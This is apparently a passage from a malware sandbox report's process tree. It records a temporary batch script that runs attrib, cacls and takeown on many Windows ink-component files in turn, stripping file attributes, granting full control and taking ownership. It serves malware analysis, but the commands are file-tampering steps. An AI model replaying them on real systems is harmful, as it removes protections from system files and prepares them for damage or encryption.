- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml""
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml" /E /G Admin:F /C
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml"
    3⤵
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml""
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml"
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml" /E /G Admin:F /C
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml"
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml""
  2⤵
  PID:1668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml""
  2⤵
  PID:1844
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml"
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml"
    3⤵
    - Modifies file permissions
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml""
  2⤵
  PID:1904
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml" /E /G Admin:F /C
    3⤵
    PID:108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml"
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml""
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml"
    3⤵
    - Views/modifies file attributes
    PID:1872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml" /E /G Admin:F /C
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml"
    3⤵
    PID:112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml""
  2⤵
  PID:1992
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml" /E /G Admin:F /C
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml"
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsjpn.xml""
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsjpn.xml"
    3⤵
    - Views/modifies file attributes
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsjpn.xml" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsjpn.xml"
    3⤵
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml"
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml"
    3⤵
    PID:760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnld.xml""
  2⤵
  PID:1612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnld.xml"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnld.xml" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnld.xml"
    3⤵
    PID:2008
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml""
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml"
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml" /E /G Admin:F /C
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml"
    3⤵
    PID:2020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml""
  2⤵
  PID:1056
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml" /E /G Admin:F /C
    3⤵
    PID:240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml"
    3⤵
    PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml""
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml"
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml" /E /G Admin:F /C
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml"
    3⤵
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptg.xml""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptg.xml"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptg.xml" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptg.xml"
    3⤵
    PID:1832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml""
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml"
    3⤵
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrus.xml""
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrus.xml"
    3⤵
    - Views/modifies file attributes
    PID:1048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrus.xml" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrus.xml"
    3⤵
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml""
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml" /E /G Admin:F /C
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml"
    3⤵
    PID:1924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrl.xml""
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrl.xml"
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrl.xml" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrl.xml"
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipssve.xml""
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipssve.xml"
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipssve.xml" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipssve.xml"
    3⤵
    - Modifies file permissions
    PID:1668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui""
  2⤵
  PID:612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui"
    3⤵
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui"
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui"
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\tipresx.dll.mui""
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\tipresx.dll.mui"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\tipresx.dll.mui"
    3⤵
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui""
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui"
    3⤵
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\tipresx.dll.mui""
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\tipresx.dll.mui"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\tipresx.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\tipresx.dll.mui""
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\tipresx.dll.mui"
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\tipresx.dll.mui"
    3⤵
    PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui""
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui"
    3⤵
    PID:240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui"
    3⤵
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui""
  2⤵
  PID:568
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui"
    3⤵
    PID:1768
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\tipresx.dll.mui""
  2⤵
  PID:612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\tipresx.dll.mui"
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\tipresx.dll.mui"
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\tipresx.dll.mui""
  2⤵
  PID:1988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\tipresx.dll.mui"
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\tipresx.dll.mui"
    3⤵
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\tipresx.dll.mui""
  2⤵
  PID:536
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\tipresx.dll.mui"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\tipresx.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\tipresx.dll.mui""
  2⤵
  PID:1696
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\tipresx.dll.mui"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\tipresx.dll.mui"
    3⤵
    PID:1684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\tipresx.dll.mui""
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\tipresx.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\tipresx.dll.mui"
    3⤵
    PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui""
  2⤵
  PID:524
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui"
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui"
    3⤵
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\tipresx.dll.mui""
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\tipresx.dll.mui"
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\tipresx.dll.mui"
    3⤵
    PID:1768
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\tipresx.dll.mui""
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\tipresx.dll.mui"
    3⤵
    PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\tipresx.dll.mui"
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\tipresx.dll.mui""
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\tipresx.dll.mui"
    3⤵
    PID:668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\tipresx.dll.mui"
    3⤵
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\tipresx.dll.mui""
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\tipresx.dll.mui"
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\tipresx.dll.mui"
    3⤵
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\tipresx.dll.mui""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\tipresx.dll.mui"
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\tipresx.dll.mui"
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\tipresx.dll.mui""
  2⤵
  PID:556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\tipresx.dll.mui"
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\tipresx.dll.mui"
    3⤵
    - Modifies file permissions
    PID:836
- C:\Windows\SysWOW64\cmd.exe
